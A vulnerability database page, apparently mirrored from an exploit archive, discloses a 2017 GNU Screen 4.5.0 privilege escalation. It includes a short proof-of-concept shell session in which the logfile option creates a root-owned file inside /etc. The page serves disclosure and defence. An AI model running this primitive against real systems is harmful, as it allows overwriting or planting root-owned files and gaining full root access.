Lucene search
K

GNU Screen 4.5.0 - Privilege Escalation Vulnerability

🗓️ 25 Jan 2017 00:00:00Reported by Donald BuczekType 
zdt
 zdt
🔗 0day.today👁 308 Views

GNU Screen 4.5.0 - Privilege Escalation Vuln. Full root access through logfile permissions chec

Code
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)
 
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
 
> [email protected]:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> [email protected]:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> [email protected]:~$ cd /etc
> [email protected]:/etc (master)$ screen -D -m -L bla.bla echo fail
> [email protected]:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> [email protected]:/etc (master)$ cat bla.bla
> fail
> [email protected]:/etc (master)$ 
 
Donald Buczek <[email protected]>
 
EDB Note: Follows up: http://seclists.org/oss-sec/2017/q1/184

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jan 2017 00:00Current
6.8Medium risk
Vulners AI Score6.8
308